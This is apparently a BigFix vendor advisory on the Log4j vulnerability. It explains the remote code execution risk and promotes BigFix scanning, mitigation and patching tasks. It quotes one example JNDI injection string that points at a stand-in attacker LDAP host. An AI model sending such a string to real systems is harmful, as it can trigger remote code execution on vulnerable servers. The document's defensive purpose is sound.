What is it?

It is a vulnerability discovered in Apache Log4j, the popular Java library developed and maintained by the Apache foundation. The Log4j library is widely used in many commercial and open-source software products as a Java logging routine. The criticality of the vulnerability has a score of 10/10 in the MITRE.org common vulnerability scoring system (CVSS) indicating the severity.  

 

How is it exploited?

The Log4j can be exploited remotely by an unauthenticated adversary using remote code execution (RCE). If an attacker sends a message that contains a string like ${jndi:ldap://dirtyLDAP.com/X}), an external code class or message lookup may result in the execution of malicious code WITHOUT authentication.

 

Who is impacted?

Hundreds of millions of devices are at risk including those in government, commercial and home computers. In addition, each affected device may have dozens or hundreds of places where the vulnerable code resides, as logging is an extremely common action in all of computing.

 

How can BigFix help?

The HCL BigFix team is working alongside our customers, security experts, and IT Operations to produce BigFix content to help you identify and fix the Log4j vulnerabilities in your environment.

BigFix is the essential tool for IT Operations. BigFix automates discovery, management, and remediation of all endpoints whether on-premises, mobile, virtual, or in the cloud – regardless of the operating system, location, or connectivity. With BigFix Insights for Vulnerability Remediation, which integrates with leading vulnerability management solutions like Tenable, vulnerabilities like Log4j can be remediated faster than any other solution in the market.

With BigFix you can discovery, mitigate, remediate vulnerabilities, create pre- and post- remediation reports, and protect remediated endpoints.

DISCOVERY

HCL BigFix has developed tasks to help BigFix users discover Log4J instances and vulnerabilities. We used the Logpresso Log4j scanner because it is an open-source Java-based scanner available on GitHub, developed by the Logpresso technical team, and is freely available to the cybersecurity community.

These tasks download a temporary Java runtime to execute the scan, and do not require Java to be installed on the system. These tasks work on Windows 8.1 and higher (x86 and x64), Mac OS X, Linux (x86, x64, armv71, ppc64, ppc64LE, and s390x), AIX 7.1 TL4 and higher, and Solaris (x86 and SPARC). With a manual download of the JRE, the tasks can also execute on HP-UX.

The following four steps articulates the general process for discovering and reporting on the vulnerability:
 

1. From the "BES Inventory and License" Content Site, execute Task 602 "Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – SCAN only".
 

2. From the "BES Inventory and License" Content Site, activate Analysis 601 "log4j2-scan results".
 

3. After scan results have been uploaded to the BigFix Server, view detailed scan results in the Analysis. See the image below.
 

4. For Executive Reporting, use the "Log4j Vulnerability Report (Logpresso Scan)" view provided in BigFix Web Reports.

MITIGATE

Prior to patches being made available from the application vendors, there are two ways to mitigate the Log4J risk:

1. Use the Logpresso Log4j-scan utility to remove vulnerable Java classes from the affected Log4j-core JAR files. The BigFix task to do this is available from the "BES Inventory and License" Content Site. It is called Task 603 (Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – WITH REMEDIATION).
The Logpresso Log4j-scan utility can perform some remediations on affected Log4j-Core JAR libraries, for both Log4j 2.x and Log4j 1.x. The utility mitigates the worst of the CVEs but may not mitigate all denial-of-service based vulnerabilities. Nonetheless, the utility this can be a very effective step at providing protection while maintaining backward-compatibility with existing applications. For details of the specific mitigations that can be performed by the tool, visit https://github.com/logpresso/CVE-2021-44228-Scanner.


2. Stop or disable the affected applications or services.
 

REMEDIATE

As vendors make patches available, BigFix will quickly create, test and deliver BigFix fixlets. Download the latest list of BigFix fixlets that remediate Log4J vulnerabilities from https://www.hcltechsw.com/bigfix/log4j-ivr.
 

REPORT

With BigFix, reports of the affected systems and libraries can be viewed and archived using BigFix Web Reports that show vulnerability and mitigation status across different points in time.
 

PROTECT

Once the vulnerability has been remediated, BigFix can ensure it doesn’t reappear. With BigFix, you can schedule recurring scans using the available Detection Task so any new systems or software with the Log4J vulnerability can be identified and remediated.

 

 

If you need more assistance, search the BigFix forum, contact BigFix Professional Services or contact Technical Support.

Try BigFix Today!

Try BigFix Today!

One endpoint management platform enabling IT Operations and Security teams to automate discovery, management and remediation – whether its on-premise, virtual, or cloud – regardless of operating system, location or connectivity.